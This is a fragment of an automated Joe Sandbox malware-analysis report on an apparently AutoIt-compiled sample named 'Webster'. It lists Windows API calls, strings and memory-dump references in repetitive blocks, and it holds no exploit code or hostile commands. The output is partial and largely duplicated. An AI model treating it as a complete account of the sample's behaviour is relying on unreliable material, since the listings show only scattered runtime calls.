                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00AC0679
                                                                                  • GetDC.USER32(00000000), ref: 00AC0683
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                                                  • ReleaseDC.USER32(?), ref: 00AC06C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00AC068D
                                                                                  • GetDC.USER32(00000000), ref: 00AC0697
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                                                  • ReleaseDC.USER32(?), ref: 00AC06C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00ADC057
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContainedObject
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 3565006973-3941886329
                                                                                  APIs
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • __wcsnicmp.LIBCMT ref: 00AEB670
                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AEB739
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3222508074-1350329615
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 00A8E01E
                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A8E037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B08186
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B0819B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: '
                                                                                  • API String ID: 3850602802-1997036262
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AF2C6A
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AF2CA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_memset
                                                                                  • String ID: |
                                                                                  • API String ID: 1413715105-2343686810
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00B0713C
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B07178
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE30B8
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE30F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  APIs
                                                                                  • __snwprintf.LIBCMT ref: 00AF4132
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __snwprintf_memmove
                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                  • API String ID: 3506404897-2584243854
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B06D86
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B06D91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B07296
                                                                                  • GetSysColor.USER32(00000012), ref: 00B072B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00B06FC7
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B06FD6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE31C9
                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AE31E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AF28F8
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AF2921
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  APIs
                                                                                    • Part of subcall function 00AF86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AF849D,?,00000000,?,?), ref: 00AF86F7
                                                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00AF84DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 2496851823-2422070025
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AD9A2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock_memmove
                                                                                  • String ID: EA06
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AD9923
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AD99A6
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp
                                                                                  • String ID: #32770
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AD88A0
                                                                                    • Part of subcall function 00AA3588: _doexit.LIBCMT ref: 00AA3592
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Message_doexit
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  APIs
                                                                                    • Part of subcall function 00ABB544: _memset.LIBCMT ref: 00ABB551
                                                                                    • Part of subcall function 00AA0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ABB520,?,?,?,00A8100A), ref: 00AA0B79
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00A8100A), ref: 00ABB524
                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A8100A), ref: 00ABB533
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ABB52E
                                                                                  Similarity
                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00AC0091
                                                                                    • Part of subcall function 00AFC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                                                    • Part of subcall function 00AFC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AC0289
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                  • String ID: WIN_XPe
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00AE9EB5
                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AE9ECC
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut